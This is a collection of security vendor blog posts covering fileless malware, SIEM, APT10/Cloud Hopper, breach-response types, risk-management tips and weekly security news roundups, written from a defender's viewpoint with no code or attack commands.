Given you’re here, you’re likely new to this topic, so please be aware in that fileless malware, fileless malware attack, and fileless attack are different words for the same thing. With that clear, let’s jump in! What is Fileless Malware and How Does It Work? There are many definitions of a fileless malware attack. I like the description from the Poneman Institute: "A fileless attack is really an attack technique - what we're talking about is a technique - that avoids downloading malicious, executable files, usually to disk, at one stage or another by using exploits, macros, scripts, or legitimate system tools instead. Once compromised, these attacks also abuse legitimate systems and admin tools and processes to gain persistence, elevate privileges, and spread laterally across the network." What's most confusing about these attacks is that they might not be 100% file-free. Typically, different technique types are termed “fileless”, but that doesn't mean the malware or an entire attack campaign won’t include executables at some stage. For example, a traditional phishing attack could have components of a fileless attack in it. Instead of opening the file, clicking on a link and it downloading something to your hard drive, malware may just run in your computer’s memory. It’s a phishing attack, but one piece is fileless. That scenario is more common than a completely fileless malware attack where everything is running in memory. More commonly, we're going to see traditional attacks: phishing campaigns, spoofs, Man in the Middles (MiTM), where something in the attack vector includes malicious code that runs in memory. The other point is that you might hear “fileless attacks” referred to as non-malware attacks, memory-based attacks, in-memory attacks, zero footprint attacks, and macro attacks. These are all different flavors of attack techniques. The whole premise behind the attack is that it is designed to evade protection by traditional file-based or signature-based tools. So any technique designed to try to circumvent or evade detection by those tools really falls into the fileless attack category. Just to get a picture of some of those techniques, in the picture below on the left there are some example delivery methods we see for fileless types of attacks. As we know, phishing and social engineering remain tactics that work for attackers. This nice diagram from Microsoft that shows a full taxonomy of fileless threats. The diagram shows the breadth of different types of techniques and different types of tools, tactics, and procedures that malicious attackers are using to launch attacks. There has been an increase in these attacks. McAfee puts it at 432% growth year over year in Powershell malware that they've witnessed. And SentinelOne found a 94% increase in just the first half of 2018. We're seeing these attack methods persist because they are effective. Attackers are also looking for ways to infiltrate that don't require some kind of vulnerability exploit, to evade detection. Trusted Admin Tools Leveraged for Fileless Attacks Living off the land is the use of trusted admin tools to conduct malicious activity. It's a way to hide in plain sight. These methods help attackers gain persistence within your environment, elevate privileges, and spread laterally across the network. Commonly, we see these with PowerShell, and WMI. We've also seen some using Visual Basic Scripts and UAC Bypass – where attackers are leveraging trusted tools to perform malicious actions. This is true within Linux and Windows as well. Example of a Fileless Malware Attack: GZipDe Here’s an example of an attack and how, at different stages, we see the use of sanctioned applications or different types of a vector that might not register with a file detection tool. Our AlienVault Labs team wrote about this in a blog post in 2018. The way this attack works is through an email phishing campaign that includes an attachment, such as a normal-looking Word document. Once you open that Word document, there's a malicious macro. Once those macros are enabled, a Visual Basic script executes, which launches a hidden PowerShell task, which then connects to the downloads and runs Metasploit in memory. You see a mix of file and fileless attack throughout the process. At first glance, it looks like a traditional attack. Everyone is familiar with phishing campaigns. Then, as you go through the processes, it runs complete programs or attacks in memory - not writing it to a disk so that an anti-virus can’t see it. It also makes this non-persistent. If an attacker is trying to evade audit and capture at a later point, fileless attacks are great. Have a Suspect Machine? One of the first steps you’ll do to investigate and audit a suspect machine is isolate it and turn it off. Since everything runs in memory in these types of attacks, as soon as you turn a suspect machine off, all evidence of the attack will be gone. There are ways to keep these attacks persistent. You can write cron jobs or tasks to a system from a PowerShell script to attain persistence. However, generally, fileless malware attacks are gone once you reboot the computer. Fileless Malware Detection AlienVault® Open Threat Exchange® (OTX™) is a community of security researchers and practitioners. Individuals contribute information to the community after seeing attacks unfold in their environments, just to help others in the community keep up to date. It’s a great resource for anyone who wants to get an understanding of what’s happening in the wild. I searched OTX™ for a few examples of fileless campaigns that we saw in 2018. This is from a quick search of “fileless”. A perfect example of a fileless campaign is GhostMiner cryptomining. It was first recognized a few hundred days ago in our community. It started out as something you would download to your hard drive. It has morphed over time to using an executable PowerShell evasion framework so that they can execute the program within memory rather than downloading it to your drive. It installs cryptomining software, but in a new way. What does it take to detect and defend and begin to protect yourself against these attacks? They are designed to evade file and signature-based protection tools - traditional anti-virus types of tools. What you need is better visibility on the host and on the endpoint. Some of the ways to detect them include things like looking for processes executing shell commands or suspicious commands executed by listening processes like ElasticSearch. We might see excessive network communications from processes that are somewhat abnormal or anomalous, as well as limited persistence and privilege escalation. We might also see attackers trying to cover their tracks by deleting their bash history or installing malicious Chrome browser extensions. All of these can be indicators that there is some type of fileless malware attack occurring in your environment. You’re going to need to spot anomalous behavior rather than a specific Indicator of Compromise (IoC). To summarize: Conclusion The growing trend of fileless malware attacks will definitely make your life as a defender more challenging. There are free tools, like OTX, to help you keep up, and other offerings, like USM Anywhere to help quickly detect fileless attacks to prevent damage, even when there aren’t yet signatures or IoCs identified for the morphed version of fileless malware. If you’re curious to explore further, check out the Fileless Attacks webcast by Danielle Russell and Aaron Genereaux where they walk you through actual detection examples.
Cyber security has three pillars of people, process, and technology. Enterprises have historically had a skewed focus towards the technology aspect of cyber security - installing another endpoint agent, or deploying another network monitoring device designed to seek out anomalys behaviour. While all these things are well and good, when you look at user awareness plans, and most companies have a once-a-year activity where they go over a few points and hope people remain educated. And as far as processes go … well, it’s unclear how much of a conscious effort is put into developing robust processes for cyber security, particularly in small and medium businesses. If we take an unscientific look at some of the trends over the last couple of years, we can see that attacks coming from non-state adversaries has been changing some of its tactics. It is no longer possible for most attackers to waltz in through the virtual front door of organizations and access their data. Which is why many attackers focus on different areas. Three of the most commonly spotted areas are as follows: Employees Going after employees is a tried and tested method. Be that dropping USB drives marked “HR bonus list” in the car park, or sending targeted phishing emails, these attacks have proven to stand the test of time. Phishing emails have been used in many ransomware infections, as well as Business Email Compromise (BEC) rely on duping users within a company. At the beginning of 2019 it was reported that the Indian unit of an Italian firm was targeted and managed to swindle $18.6m. This trend shows no signs of slowing down as Business email compromise (BEC) fraud attacks soared 58% in the UK during 2018, possibly affecting as many as half a million SMEs, according to Lloyds Bank data. Customers Employees aren’t the only ones targeted by criminals. Customers of companies are also fair game in the eyes of hackers. Phishing attacks are a common avenue, with scammers masquerading as popular brands such as Apple or Amazon, threatening behaviour such as law enforcement or the tax office, or even pulling at emotions such as love and greed. In fact a Netflix phishing scam was so bad, even the FTC issued a statement warning customers about it. But phishing isn’t the only attack avenue against customers. Credential stuffing has also risen in popularity. This is where scammers take the passwords of users that have been disclosed in breaches, and use those credentials against other systems in the hope that users have reused passwords across different services. Third Parties Another avenue attackers target are third parties. This could be any company in the supply chain, or with whom the target has a business relationship with. The infamous Target breach of 2013 was conducted after attackers broke in via a HVAC company. In a more recent incident, LocalBitcoins was targeted by attackers who were able to compromise the sites forums and redirect users to a phishing site from where they captured users credentials. Recommendations Cyber security is perhaps the most challenging game of whack-a-mole in existence. Where we plug one hole, the attackers move to another, easier to exploit hole. With this, we should look to continually move forward and proactively try and stop attackers new tactics becoming full-fledged epidemics. To do so, enterprises need to have a consistent approach to not just user awareness, but also increase awareness for their customers, and 3rd party partners. The most important things to consider would be: Password reuse Raise awareness of the dangers and risks associated with password reuse. Also provide tools or methods to help eliminate password reuse such as the use of password managers. Clicking on links & opening attachments While users within enterprises are getting some training on the dangers of clicking links or opening email attachments, this should extend to customers too. Establish good practices by avoiding sending links in emails, and asking users to navigate directly to the website to log onto their accounts. Reporting issues Finally, and perhaps most importantly is to have a simple and accessible way for both employees and customers to report any suspicious activity. Or indeed, report that they may have fallen victim to a scam by clicking on a link, opening an attachment, or sending sensitive information to a scammer.
New infographic! The full report is here.
Security Have and Have-Nots Way back in around the 2010 / 2011 timeframe Wendy Nather coined the phrase "The Security Poverty Line" in which she hypothesised that organisations, for one reason or another (usually lack of funds), can't afford to reach an effective level of information security. Nearly a decade on, and while the term has sunk into frequent usage within the information security community, are we any better at solving the issue now that we've identified it? I asked Wendy on her thoughts, to which she said, “I don’t think we’ve even come close to understanding it yet. And I think solving it will take an effort on the level of US health care reform.” It’s a morbid thought, and can leave one with a feeling of helplessness. So, I thought I’d try to scratch beneath the surface to see what we can understand about the security poverty line. Technical Debt The term technical debt has become more prevalent within information security over the years. Whereby a company will accrue technical debt, or information security risk over time due to decisions they've made. For example, if a service is launched before undertaking a full penetration test or code review, it adds to the debt of fixing any subsequent issues in a live environment. Exponential Losses One of the challenges with technical debt is that it doesn’t occur in a linear manner, rather the debt, or fall below the poverty line, occurs at an exponential rate. Speaking to people who run small businesses, things become a bit clearer as to some of the challenges they face. Cybersecurity needs investment in different areas, initially that is to hire expertise, or invest in technologies. Neither of which are necessarily the smallest of investments. But then there are ongoing costs - the cost to maintain security, to undertake ongoing testing. Then, when wanting to do business with larger companies, the smaller company is usually subject to a 3rd party assurance process where they need to demonstrate they meet all the cybersecurity requirements of the larger company, even in instances where the controls may not be directly applicable. Finally, in the event of an incident, a company that has already under-invested in security is faced with loss of business, or even legal action from partners, regulatory fines, as well as the cost of incident recovery and PR management. How Much Information Security is Enough? With such a seemingly endless laundry list of things to consider in the security world, the question on the minds of most businesses is, ‘how much is enough’? Unfortunately, if you’re looking for a hard number, you’ll be disappointed. Because the threats and challenges present in the cyber world represent a moving target. But this doesn’t mean all effort is futile, it’s more a case of looking at the world differently. One way to look at this could be through the lens of finite and infinite games, as coined by James Carse in his 1986 book of the same name. The idea is that there are two kinds of games, finite, and infinite games. Finite games are those which have rules such as number of participants, boundaries, time duration, and so forth. After a certain period of time, a winner is declared in accordance with the agreed upon rules. If you try to look at cyber security as a finite game, you will inevitably pull your hair out in frustration and turn into precisely how urban dictionary describes Infosec. Cyber Security is more of an infinite game - one where there is no set rules or boundaries or even a winner or loser as defined in the classical sense. Rather the purpose of an infinite game is to always be in a position to continue the game. Continuing The Game Asking companies to continue the game when resources are scarce and they’re living on the security poverty line. But once you understand the game, the players, the pieces, and the moves, it becomes easier to plan your strategy. For that, it’s useful to consider the following points. 1. People Having the right people can be the difference between making it or not. It doesn’t necessarily mean hiring an entire security department. Sometimes, all it needs is a consultant to help provide guidance and steer towards best security practices to ensure security is built right from the beginning. 2. Technology IT security technologies have come a long way in the last decade. While the constant news cycle may feel like things are getting worse, we actually see more attacks that focus on attacking humans through phishing, or compromises through third parties. Therefore, it makes sense to invest broadly in technologies that offer a broader set of capabilities. These can be more affordable, not just to buy, but to maintain on an ongoing basis. 3. Outsourcing In today’s age of the cloud and service providers, in many cases it doesn’t make sense to keep everything in-house. Securing the services of a reputable MSSP can take away the need to run your own security operation centre. Or having a PR agency on a retainer can help smooth over any incidents that need reporting. 4. Insurance Finally, where risk can’t be mitigated or accepted, consider transferring it to an insurance provider. Not only can insurance help alleviate the financial cost of a breach, but it can a long way in demonstrating to customers, shareholders, or partners that insurance was part of a broad cyber security plan to keep data secure.
Security information and event management (SIEM) technology is transforming the way IT teams identify cyber threats, collect and analyze threat data and respond to security incidents. But what does that all mean? To better understand SIEM, let's take a look at SIEM technology, how it works and its benefits. What Is SIEM? SIEM technology is a combination of security event management (SEM) and security information management (SIM) technologies. IT teams use SEM technology to review log and event data from a business' networks, systems and other IT environments, understand cyber threats and prepare accordingly. Comparatively, IT teams use SIM technology to retrieve and report on log data. How Does SIEM Work? IT teams use SIEM technology to collect log data across a business' infrastructure; this data comes from applications, networks, security devices and other sources. IT teams can then use this data to detect, categorize and analyze security incidents. Finally, with security insights in hand, IT teams can alert business leaders about security issues, produce compliance reports and discover the best ways to safeguard a business against cyber threats. What Are the Benefits of SIEM? SIEM technology frequently helps businesses reduce security breaches and improve threat detection. The AlienVault Infographic and "2019 SIEM Survey Report" revealed 76 percent of cyber security professionals reported their organization's use of SIEM tools resulted in a reduction in security breaches. Additionally, 46 percent of survey respondents said their organization's SIEM platform detects at least half of all security incidents. Also, SIEM tools typically provide compliance reporting – something that is exceedingly valuable for businesses that must comply with the European Union (EU) General Data Protection Regulation (GDPR) and other data security mandates. SIEM tools often come equipped with compliance reporting capabilities, ensuring IT teams can use these tools to quickly identify and address security issues before they lead to compliance violations. SIEM tools help speed up incident response and remediation, too. A cyber security talent shortage plagues businesses worldwide, but SIEM tools help IT teams overcome this shortage. SIEM tools are generally simple to deploy, and they often can be used in combination with a business' third-party security tools. As such, SIEM tools sometimes reduce the need to hire additional cyber security professionals. Is SIEM Right for My Business? SIEM technology is designed for businesses of all sizes and across all industries. If a mid-sized retailer wants to protect its critical data against insider threats, for example, SIEM technology can help this business do just that. Or, if a globally recognized bank requires a user-friendly compliance management tool, it can deploy SIEM technology as part of its efforts to meet industry mandates. SIEM tools can even help businesses protect their Internet of Things (IoT) devices against cyber attacks, proactively seek out cyber threats and much more. How Can I Select the Right SIEM Tool for My Business? The right SIEM tool varies based on a business' security posture, its budget and other factors. However, the top SIEM tools usually offer the following capabilities: Compliance reporting Database and server access monitoring Incident response and forensics Internal and external threat identification Intrusion detection and prevention system, firewall, event application log and other application and system integrations Real-time threat monitoring, correlation and analysis across multiple systems and applications Threat intelligence User activity monitoring Lastly, as you search for the right SIEM tool for your business, it often helps to partner with a proven SIEM technology provider. If you have the right SIEM technology provider at your side, your business can seamlessly integrate an SIEM tool into its day-to-day operations. As a result, your IT team can use SIEM technology to streamline its security management.
Hello February! I was doing some research last night and was surprised to discover that the Target breach is over five years old! Five years! I was sure it only happened a couple of years ago - but such is the fast-paced nature of the industry, and also I guess a testament to how certain major breaches become part of infosec folklore. Like TJX, or Heartland - and no, I’m not going to look up when any of those occurred because I’ll probably end up feeling a lot older than I already do. Enough reminiscing - let’s get down to it. The Big Five There’s been a lot of things I didn’t heart this week, although for one reason or another they ended up in my list of things to talk about. So, if you’re wondering about the stories regarding Facebook and Apple, and also Google, then yes, I did see them, and no, I don’t fancy talking about them. But speaking of large companies, Kashmir Hill has undertaken what is perhaps becoming my favourite piece of tech journalism ever. WIth detailed write ups and slick videos showcasing how she cut out the big five of Amazon, Facebook, Google, Microsoft, and Apple from her life, one week at a time. Life without the tech giants | Gizmondo Week 1, Amazon | Gizmondo Week 2, Facebook | Gizmondo Week 3, Google | Gizmondo Considerations for When Your Apartment Goes “Smart” Everything is getting ‘smart’ these days. By smart, I mean connected and vulnerable. So, what should you do if you live in an apartment where everyone is getting fancy new smart locks (or terribly insecure cheap locks depending on how you look at it). Lesley Carhart recently found herself in the same position, and has written a really good post on security considerations if you ever find yourself in a similar position. Security Things to Consider When Your Apartment Goes ‘Smart’ | tisiphone Abusing Exchange: One API Call Away From Domain Admin An attacker with just the credentials of a single lowly Exchange mailbox user can gain Domain Admin privileges by using a simple tool. Very good writeup here. Abusing Exchange: One API call away from Domain Admin | dirkjanm.io Sending Love Letters The "Love Letter" malspam campaign has now changed its focus to Japanese targets and almost doubled the volume of malicious attachments it delivers. Love Letter Malspam Serves Cocktail of Malware, Heavily Targets Japan | Bleeping Computer While we’re talking about Japan, a new law in Japan allows the nation's National Institute of Information and Communications Technology (NICT) to hack into citizens' personal IoT equipment as part of a survey of vulnerable devices. The survey is part of an effort to strengthen Japan's network of Internet of Things devices ahead of the 2020 Tokyo Olympic games. I like the intent behind this initiative, but the execution leaves me a little worried. Scanning for devices is one thing, actively logging into a device is another. Will be interesting to see how this pans out. Japan Authorizes IoT Hacking | Dark Reading South Korean Delivery Apps Accidentally Leaks 26M Documents The Korean Android Apps Zcall Delivery Agent and Zcall Delivery Account Manager, which are used to schedule and report package pickups and deliveries, have accidentally leaked personal information about their users. The leaked data includes not only names, addresses, phone numbers, and delivery times, but also plaintext passwords for shop and staff logins, as well as what appears to be plaintext banking information. A statement on the company’s website acknowledges the leak and assured customers that the outflow route has been blocked, but blames the incident to the Korea Internet Promotion Agency, rather than a hacking intrusion on their servers. South Korean Delivery Apps Accidentally Leaks 26m Documents | The Daily Swig Judge Rejects Yahoo’s Data Breach Settlement Proposal Yahoo’s proposed a $50 million pay-out, plus two years of free credit monitoring for about 200 million people in the United States and Israel was rebuffed by U.S. District Judge Lucy Koh, who said she couldn’t declare the settlement “fundamentally fair, adequate and reasonable” because it did not say how much victims could expect to recover, according to court documents. In 2016, the massive data breach compromised the information of more than one billion Yahoo users affecting email addresses and other personal information marking the largest data breach in history. Judge rejects Yahoo’s data breach settlement proposal | SC Magazine Inside the UAE’s Secret Hacking Team of American Mercenaries Presented without comment - it’s a long article worth reading and drawing your own conclusions. Inside the UAE’s secret hacking team of American Mercenaries | Reuters Other Things I Hearted This Week Work Is Not Your Family, As The Fyre Festival Doc Reminds Us | Huffington Post 2019 Tech M&A Outlook | 451 Research Looking for fraud | Antisocial engineer
Threat Actors That Don’t Discriminate When it comes to threat actors and the malware variants they use, let’s talk dating — or rather, the way people date — because one could argue there are marked similarities between the two. You see, there are criminal groups who have a “type,” i.e. using malware that targets specific industries or even organizations — say, financial services (ever-popular and oh-so debonair) or perhaps critical infrastructure (spicy and daring!), or even healthcare for those who prefer staid and demure. Yet other groups are the free lovin’ types who go after multiple sectors using many different malware variants and approaches to accomplish their goal — no discriminating with this bunch. Let’s look at one such example, APT10 / Cloud Hopper, which is likely the group behind a long running, sophisticated campaign that uses multiple malware variants to target many different sectors in many different countries. You can check out some of the pulses relating to APT10 / Cloud Hopper on the Open Threat Exchange (OTX). The U.S. National Cybersecurity and Communications Integration Center (NCCIC) reports the campaign started in May 2016, and NCCIC last updated its alert in December 2018 — so it’s not going away yet. The group known as APT10 / Cloud Hopper has hit quite a few victims over the last few years in many different sectors, such as: information technology, energy, healthcare and public health, communications, and critical manufacturing. However, their “date of choice” seems to be MSSPs due to the fact a that credential compromises within those networks could potentially be leveraged to access customer environments. From OTX pulse “Operation Cloud Hopper”: The espionage campaign has targeted managed IT service providers (MSSPs), allowing the APT10 group unprecedented potential access to the intellectual property and sensitive data of those MSSPs and their clients globally. This indirect approach of reaching many through only a few targets demonstrates a new level of maturity in cyber espionage – so it’s more important than ever to have a comprehensive view of all the threats your organization might be exposed to, either directly or through your supply chain. As any clever serial dater would do, APT10 / Cloud Hopper doesn’t use just one approach. The NCCIC reports they have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures — for example, PLUGX / SOGU and REDLEAVES. And although the observed malware is based on existing malware code, APT10 / Cloud Hopper modifies it to improve effectiveness and avoid detection by existing signatures. How Can APT10 Group Impact You? If these free lovin’ bad guys decide to come after you, they’re likely looking for your data (perhaps to steal intellectual property). At a high level, they’re accomplishing this by leveraging stolen administrative credentials (local and domain) and certificates to place sophisticated malware implants on critical systems (such as PlugX and Redleaves). Depending on the defensive mitigations in place, they then gain full access to networks and data in a way that appears legitimate to existing your monitoring tools. Voila! They’ve gone from first date to a home run! Wired Magazine reported the following on APT10 in a December 2018 article: In the case of the MSP intrusions, that malware appears to have mostly made up of customized variants of PlugX, RedLeaves—which have previously been linked to Chinese actors—and QuasarRAT, an open source remote access trojan. The malware posed as legitimate on a victim’s computer to avoid antivirus detection, and communicated with any of the 1,300 unique domains APT10 registered for the campaign. What Can You Do About APT10 Group? For sophisticated, long-standing, and non-discriminating campaigns such as this, the NCCIC suggests there is no single or set of defensive techniques or programs that will completely avert all malicious activities — because new variants are constantly being created. Instead, security pros should be using a defense-in-depth approach (multiple layers of security) to provide a complex barrier to entry and increase the likelihood of detection. Among the key recommendations are the following (which can be easily managed via the AlienVault Unified Security Management (USM) platform). Conduct regular vulnerability scans of the internal and external networks and hosted content to identify and mitigate vulnerabilities. Implement an Intrusion Detection System (IDS) to: conduct continuous monitoring; send alerts to a SIEM tool; monitor internal activity. AlienVault Labs has identified more than 660 Indicators of Compromise (IOCs) associated with this campaign, which are shared in OTX. You can use USM Anywhere or OSSIM to directly check for these IOCs throughout your attack surface. The Labs team has also released IDS signatures and correlation rule updates to the USM Anywhere Platform so customers can identify suspicious activity that could be related to this campaign. For further investigation, visit the Open Threat Exchange (OTX) to see what research members of the community have shared: https://otx.alienvault.com/pulse/59096495b8eeba365246b24d/ Also, check out US-CERT Alert (TA17-117a), Last revised December 20, 2018.
With the constant barrage of headlines regarding breaches in the last few years, it seems that society in general has become numb to losing personal data. This year’s overarching cybersecurity theme is clear: We’re all in this together because we simply can’t do it alone. Effective defense demands a team effort where employees, enterprises, and end users alike recognize their shared role in reducing cybersecurity risks. To borrow a phrase, “If not us, then who? If not now, then when? by John Lewis. Here are tips for improving your cyber risk management this year. Tip #1: Balance risk versus reward. The key is to balance risks against rewards by making informed risk management decisions that are aligned with your organization’s objectives — including your business objectives. This process requires you to: Assign risk management responsibilities; Establish your organization’s risk appetite and tolerance; Adopt a standard methodology for assessing risk and responding to risk levels; and Monitor risk on an ongoing basis. Tip #2: Use your investments wisely. When determining the best strategy for future cyber investments, it’s vital that you review your organization’s current security posture and existing security controls, including technology, people and processes. Before making new investments, perform an architectural and program review to understand how the existing controls can be utilized to address your identified risks. There are almost always ways to optimize, reduce cost, or minimize upcoming investments. Tip # 3: Be nimble; make sure your strategy can quickly adapt. Business is not static and neither are the solutions that enable and protect it. To grow, compete, and own its place in the market, a business must adopt new models and technologies to stay relevant and competitive. As the business evolves, so too must the operations and security solutions that protect it. Today, a cybersecurity strategy needs to be nimble to match the pace and dynamic modeling of the business it is protecting. Tip #4: Don’t lose sight of the data — are you asking the right questions? Before analyzing your security controls, take a step back to understand what data is needed to support the business, who that data must be shared with, and where that data is stored. Look at your operations, the flow of data into, throughout, and outside of your organization, and the risks associated with your business model. This will give you an understanding of the exposures that the data faces, enabling you to address and prioritize security measures. The three questions most organizations should be asking are: How secure are we? Are we going to be secure based on our current and future business plans? Are we investing the right amount of time and resources to minimize risk and ensure security — especially people, technology and process? Tip # 5: Re-imagine your security approach; don’t go looking for the silver bullet. The cybersecurity market is flooded with solutions, leaving many organizations struggling to select the right protection for their business and get the best value from their investments. Most cybersecurity solutions, however, are point solutions, which don’t adequately address today’s threats. Tip # 6: Make security awareness stick. More than 90 percent of security breaches involve human error. These acts are not always malicious, but often careless and preventable. To change security behavior effectively, employees must know what to do, care enough to improve, and then do what’s right when it matters. An effective security awareness program can help change organizational behavior and lower risk. Look for best practices for implementing a successful security awareness training program to change employee behavior and help make your organization more secure. Consider the answers to the following questions.: Does the program assess your users’ ability to spot real-world phishing attacks? How is the training delivered to help employees identify phishing and other social engineering tactics? Is there flexibility for planning, scheduling, and running the program? Tip #7: Think beyond compliance. Achieving Compliance is not the ultimate goal, it is about sustaining compliance. Security and Compliance are not equal. Compliance management is not a project that you start and finish, but rather an ongoing program that needs to be continuously maintained. To make the journey easier, follow an integrated compliance and risk management framework that addresses security, privacy, risk, and compliance, such as the National Institute of Standards of Technology (NIST) framework. This ensures a more manageable program and allows you to report compliance posture more efficiently.
Breaches aren’t easy to deal with, especially if you are of the opinion that companies are people too. Having seen, been part of, and lent a shoulder to many a breach, here are nine of the common ways companies respond to breaches. Delayed response A delayed response is when a breach has occurred and the company is informed a long time after the fact, usually when the data appears on a dark web sharing site. The company sometimes informed by law enforcement, or by reading about it on Brian Krebs’ blog. Complicated response (traumatic or prolonged) A complicated breach becomes severe with time and can impact the entire company. This can be the case when regulators step in to look at a breach. Were you PCI DSS compliant? Well not anymore. Did you have European citizen data? Well say hello to my little GDPR friend. Disenfranchised response Disenfranchised breaches are where the company experiences a loss, but others do not acknowledge the importance or impact. For example, an intellectual property breach that allows a competitor to get ahead is felt by the company, but elicits little, if any sympathy from customers. Cumulative response A cumulative breach is when multiple breaches or incidents are experienced, often within a short period of time. For example, getting locked out of your IoT devices accounts while records are being exfiltrated out of the mainframe during a DDoS attack. A cumulative breach can be particularly stressful because a company doesn’t have time to properly respond to one incident stating how they ‘take security seriously’ before experiencing the next. Distorted response Sometimes a company responds to a breach in extreme and hostile ways. In a manner befitting a toddler, the company may resort to blaming a partner or any other third party company. On occasion the finger of blame is pointed towards an employee or contractor for not patching a system. Or, in some cases, the company will want to set an example and unceremoniously fire the CISO. Inhibited response Also known as “keep this between us” is a conscious decision by a company to keep details of a breach limited to a very small group. Problems can occur if customers or regulators get wind of it, and can cause bigger issues down the road. By then, the only viable option for companies is to shred the documents, wipe the hard drives, and research countries with non-extradition treaties. Collective response Collective breach is felt by a wider group, and the impact is shared. It can be a useful tactic in bringing all people on the same side and put their differences aside. When everyone is forced to change their passwords after a breach, it gives common ground for them to share the pain. Absent response A favourite of social media giants, absent response is when a company doesn’t acknowledge or show signs of any response. This can be as a result of shock, denial, or simply passing everything onto business as usual. It’s important to note that in some instances, just because you can’t see the signs of a response, it doesn’t necessarily mean that a company isn’t taking responsive actions. Or it could just mean they don’t care, it can be hard to tell. Anticipatory response Remember all those posters telling you ‘it’s not a matter of if, but when’ - well, that can have a positive affect as companies can go into anticipatory mode, expecting a breach and preparing accordingly. It doesn’t lessen the sting of a breach, but does allow you to have plans in place to respond and recover.
And in what feels like a blink of an eye, January 2019 is almost over. Time sure does fly when you’re having fun. But we’re not here to have fun, this is a serious weekly roundup of all the security news and views, with a few cynical observations thrown in for good measure. Tables Turn on Journalists Colorado journalists on the crime beat are increasingly in the dark. More than two-dozen law enforcement agencies statewide have encrypted all of their radio communications, not just those related to surveillance or a special or sensitive operation. That means journalists and others can’t listen in using a scanner or smartphone app to learn about routine police calls. Law enforcement officials say that’s basically the point. Scanner technology has become more accessible through smartphone apps, and encryption has become easier and less expensive. Officials say that encrypting all radio communications is good for police safety and effectiveness, because suspects sometimes use scanners to evade or target officers, and good for the privacy of crime victims, whose personal information and location can go out over the radio. How long before journalists start touting, “If you’re innocent you have nothing to fear.” What would really be ironic is if journalists ask that police put backdoors into their comms so that journalists could listen in. Encryption efforts in Colorado challenge crime reporters, transparency | Columbia Journalism Review Would a Detection by Any Other Name Detect as Well? One detection category is not necessarily “better” than other categories. While detection categories and descriptions might lead one to think that certain categories are better, the category alone is not enough to give a complete picture of the detection. It’s important to look at the technique under test, the detection details, and what’s considered normal behavior in your organization’s environment to help you understand what detections are most useful to you. Part 1:Would a Detection by Any Other Name Detect as Well? | Frank Duff, Medium Breach of the Week Over 24 million financial and banking documents were found online by researcher Bob Diachenko as one does I suppose. The server, running an Elasticsearch database, had more than a decade’s worth of data, containing loan and mortgage agreements, repayment schedules and other highly sensitive financial and tax documents that reveal an intimate insight into a person’s financial life. Millions of bank loan and mortgage documents have leaked online | TechCrunch Voicemail Phishing Campaign Tricks You Into Verifying Password A new phishing campaign is underway that utilizes EML attachments that pretend to be a received voicemail and prompts you to login to retrieve it. This campaign also uses a clever tactic of tricking you into entering your password twice in order to confirm that you are providing the correct account credentials. Voicemail Phishing Campaign Tricks You Into Verifying Password | Bleeping Computer 265 Researchers Take Down 100,000 Malware Distribution Websites In a showcase of the good that can happen when the right people come together, security researchers across the globe united in a project dedicated to sharing URLs used in malicious campaigns managed to take down close to 100,000 websites actively engaged in malware distribution. Called URLhaus, the project was initiated by abuse.ch, a non-profit cybersecurity organization in Switzerland. It started at the end of March 2018 and recorded a daily average of 300 submissions from 265 security researchers. 265 Researchers Take Down 100,000 Malware Distribution Websites | Bleeping computer VC Funding of Cybersecurity Companies Hits Record $5.3B in 2018 According to new data out by Strategic Cyber Ventures, a cybersecurity-focused investment firm with a portfolio of four cybersecurity companies, more than $5.3 billion was funneled into companies focused on protecting networks, systems and data across the world, despite fewer deals done during the year. That’s up from 20 percent — $4.4 billion — from 2017, and up from close to double on 2016. This isn’t Sparta, this really is madness! VC funding of cybersecurity companies hits record $5.3B in 2018 | TechCrunch Other Things I Hearted This Week U.S. CEOs Are More Worried About Cybersecurity Than a Possible Recession | Fortune How to make it big in tech and still keep the demons at bay | Guardian How Dr. Jessica Barker brought positivity into cybersecurity | The Cyber Woman How Much Time Americans Spend In Front Of Screens Will Terrify You | Forbes
What does it mean to be a thought leader? Is it merely the opposite of a thought follower, or is it more nuanced than that? Becoming a thought leader is the epitome of professional success. But a thought leader isn’t a title that one attains by going to Harvard, or Cambridge. No, it’s a title bestowed by your peer But wait, there are many naysayers in this world who will try to make out that thought leadership is a made up marketing term. But they're wrong. Thought leaders are the future, with them, the future is bright, and will lead us to an enlightened future, where blockchains and machine learning will co-exist in harmony, fuelled by cryptocurrencies and moderated by artificial intelligence. So how does one become known as a thought leader? Simple, just watch this video and follow the awesome advice given by me and @SpaceRog @J4vv4D
67% of small and micro businesses have experienced a cyber attack, while 58% have experienced a data breach within the last 12 months, according to a study conducted by the Ponemon Institute. Cybersecurity has become one of the major questions that plague the 21st century, with numerous businesses reporting significant losses resulting from loss of private customer data, denial of service (DoS) attacks that cripple operations and internal employee threats that pose a growing data security challenge for both small and large companies. When you consider the effects of the cyber attack in Alaska and the astounding number of businesses it crippled, it's clear that businesses owners need to understand the threats they face today. The Question of Cybersecurity A few decades ago, the thought of cyber warfare would have seemed far-fetched to say the least. But today, it has become as likely as it is terrifying, especially when you consider how many of our gadgets are connected to the internet - mobile phones, smart TVs, PCs, and IoT devices. The technical advancements in data-hacking have led to the parallel development of data-protection. While downloading an antivirus software may previously have been sufficient protection, this is now only a preliminary measure, and must be coupled with stronger controls like 2-factor authentication, access control, and raising threat awareness. The cyber-security industry grows steadily each day, and it is now possible to find adequate protection for all your gadgets: from your phone to your tablet and yes, even your new television set. Artificial Intelligence Shaping Cybersecurity If you have a basic interest in the tech world, you will have undoubtedly come across Sophia. Sophia is a humanoid robot and may be termed by many as the perfect illustration of how far AI has come. It is for this reason that AI is leading the cybersecurity field. This is through the application of the concept of synthesizing data. Basically, what this means is that two independent chunks of information can be combined to arrive at a single conclusion. In layman's terms, AI is expected to improve cybersecurity by speeding up incident response when malicious activity is detected, thwarting ransomware and automating practices. This way, companies will be able to remain a step ahead of potential cyber threats. The Future of Cybersecurity Innovation Conventionally, data transfer has been achieved through electrical signals. However, this may change if we enter the era of data exchange through light signals. This works through the use of photons as carriers of quantum information in cyberspace. Photons are light particles which are generated simultaneously in pairs. With timing controls, this would mean that data transfer would only be possible if twin-photon particles existed for the sender and recipient. Ultimately, the only way to hack the data would be to upend the laws of physics. More innovations like deep learning, cloud technology, and hardware will revolutionalize the future of cybersecurity, making it easier for companies to prevent cyber attacks. The field of cybersecurity is shifting and improving daily to match the changing needs of today’s cyberspace. It is essential that everyone, including businesses, become familiar with the means with which to protect their data. Understanding the changing face of cybersecurity is a key step to achieving that goal.
